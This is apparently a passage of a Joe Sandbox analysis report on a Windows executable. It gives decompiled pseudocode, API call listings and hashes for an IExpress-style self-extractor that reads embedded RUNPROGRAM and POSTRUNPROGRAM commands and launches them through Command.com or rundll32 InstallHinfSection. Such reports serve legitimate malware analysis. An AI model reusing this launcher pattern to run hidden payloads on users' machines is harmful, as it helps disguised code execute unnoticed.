f86448 WriteFile 3261->3262 3263 f8643a 3261->3263 3264 f86465 CloseHandle 3262->3264 3266 f86ce0 4 API calls 3263->3266 3264->3263 3267 f8648f 3266->3267 3268 f83100 3269 f831b0 3268->3269 3270 f83111 3268->3270 3272 f831b9 SendDlgItemMessageA 3269->3272 3275 f83141 3269->3275 3271 f8311d 3270->3271 3273 f83149 GetDesktopWindow 3270->3273 3274 f83138 EndDialog 3271->3274 
3271->3275 3272->3275 3276 f843d0 11 API calls 3273->3276 3274->3275 3277 f8315d 6 API calls 3276->3277 3277->3275 3278 f84200 3279 f8420b SendMessageA 3278->3279 3280 f8421e 3278->3280 3279->3280 3281 f86c03 3282 f86c1e 3281->3282 3283 f86c17 _exit 3281->3283 3284 f86c27 _cexit 3282->3284 3285 f86c32 3282->3285 3283->3282 3284->3285

Callgraph (legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available)

Control-flow Graph (legend: Executed; Not Executed)
                                                                        C-Code - Quality: 82%
                                                                        			E00F83BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0xf89124 =  *0xf89124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0xf88a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0xf88c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E00F8468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E00F844B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0xf89124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E00F81AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E00F86CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E00F83FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0xf88580;
                                                                        													if( *0xf88580 != 0) {
                                                                        														E00F82267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0xf88180;
                                                                        											if( *0xf88180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E00F844B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0xf89124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0xf89a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E00F86495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E00F844B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0xf89124 = E00F86285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E00F844B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0xf88a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0xf89a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0xf88a38 & 0x0000ffff;
                                                                        											_v380 = 0xf89154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0xf891e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0xf88a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0xf89a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0xf88d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0xf89a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0xf8a288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0xf89124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0xf89a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0xf88a20;
                                                                        										if( *0xf88a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E00F8202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E00F8468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0xf88c42;
                                                                        									if( *0xf88c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0xf88a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F8468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F8468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E00F81781( &_v276, 0x104, _t130, 0xf88c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E00F8468F(_t130, 0xf89a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}






























































                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F83C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F83CDC
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846A0
                                                                          • Part of subcall function 00F8468F: SizeofResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846A9
                                                                          • Part of subcall function 00F8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F846C3
                                                                          • Part of subcall function 00F8468F: LoadResource.KERNEL32(00000000,00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846CC
                                                                          • Part of subcall function 00F8468F: LockResource.KERNEL32(00000000,?,00F82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846D3
                                                                          • Part of subcall function 00F8468F: memcpy_s.MSVCRT ref: 00F846E5
                                                                          • Part of subcall function 00F8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F846EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F88C42), ref: 00F83D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F83E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F88C42), ref: 00F83F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F88C42), ref: 00F83F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F88C42), ref: 00F83F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F88C42), ref: 00F83FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$zhiga
                                                                        • API String ID: 1032054927-1156627247
                                                                        • Opcode ID: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                        • Instruction ID: a568d07caecc8feb6d8a913719d33642b45830e34247fb3029338a0eecd9d0eb
                                                                        • Opcode Fuzzy Hash: 0e18e8aaf6d7a4457ebeafd849d3a92c9d78a6be1d10c5da1dc0899021cb63e3
                                                                        • Instruction Fuzzy Hash: 30B11371A083059BD724FF248C45BFB76E4EB85B60F00092EFA85D61A1EB74D905FB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        C-Code - Quality: 82%
                                                                        			E00F81AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E00F81680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E00F81A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E00F81781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					E00F8658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E00F81680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E00F866C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E00F866C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E00F81680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E00F81781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E00F816B3( &_v1552, 0x400, " ");
                                                                        										E00F816B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E00F82AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E00F8171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E00F81A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E00F81A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E00F844B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0xf89120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf81140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0xf89a34 =  *0xf89a34 & 0xfffffffb;
                                                                        										if( *0xf89a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E00F8171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0xf89a34 =  *0xf89a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E00F81680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E00F81680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E00F86CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}














































                                                                        0x00f81cee
                                                                        0x00f81cee
                                                                        0x00f81e89
                                                                        0x00f81e91
                                                                        0x00f81e92
                                                                        0x00f81e94
                                                                        0x00f81e97
                                                                        0x00f81ea4
                                                                        0x00f81ea4
                                                                        0x00f81c61
                                                                        0x00f81c07
                                                                        0x00f81bd3
                                                                        0x00f81b7b

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00F81C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F81140,00000000,00000008,?), ref: 00F81CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 00F81D1B
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-3964152161
                                                                        • Opcode ID: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                        • Instruction ID: 66f4a994bea8bdc0173ff2bc56a85e3c9b5e05fac5a9d721caae0b54b5a0c35c
                                                                        • Opcode Fuzzy Hash: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                        • Instruction Fuzzy Hash: EAA13871E002185BEB20BB24CC49BFA776DFB81320F144795E555A32D1EBB49E87EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 406 f82f1d-f82f3d 407 f82f6c-f82f73 call f85164 406->407 408 f82f3f-f82f46 406->408 416 f82f79-f82f80 call f855a0 407->416 417 f83041 407->417 410 f82f48 call f851e5 408->410 411 f82f5f-f82f66 call f83a3f 408->411 418 f82f4d-f82f4f 410->418 411->407 411->417 416->417 424 f82f86-f82fbe GetSystemDirectoryA call f8658a LoadLibraryA 416->424 420 f83043-f83053 call f86ce0 417->420 418->417 421 f82f55-f82f5d 418->421 421->407 421->411 428 f82fc0-f82fd4 GetProcAddress 424->428 429 f82ff7-f83004 FreeLibrary 424->429 428->429 432 f82fd6-f82fee DecryptFileA 428->432 430 f83006-f8300c 429->430 431 f83017-f83024 SetCurrentDirectoryA 429->431 430->431 433 f8300e call f8621e 430->433 434 f83054-f8305a 431->434 435 f83026-f8303c call f844b9 call f86285 431->435 432->429 446 f82ff0-f82ff5 432->446 444 f83013-f83015 433->444 436 f8305c call f83b26 434->436 437 f83065-f8306c 434->437 435->417 447 f83061-f83063 436->447 442 f8307c-f83089 437->442 443 f8306e-f83075 call f8256d 437->443 449 f8308b-f83091 442->449 450 f830a1-f830a9 442->450 452 f8307a 443->452 444->417 444->431 446->429 447->417 447->437 449->450 453 f83093 call f83ba2 449->453 455 f830ab-f830ad 450->455 456 f830b4-f830b7 450->456 452->442 460 f83098-f8309a 453->460 455->456 458 f830af call f84169 455->458 456->420 458->456 460->417 461 f8309c 460->461 461->450
                                                                        C-Code - Quality: 82%
                                                                        			E00F82F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0xf88004; // 0x7e92e7a6
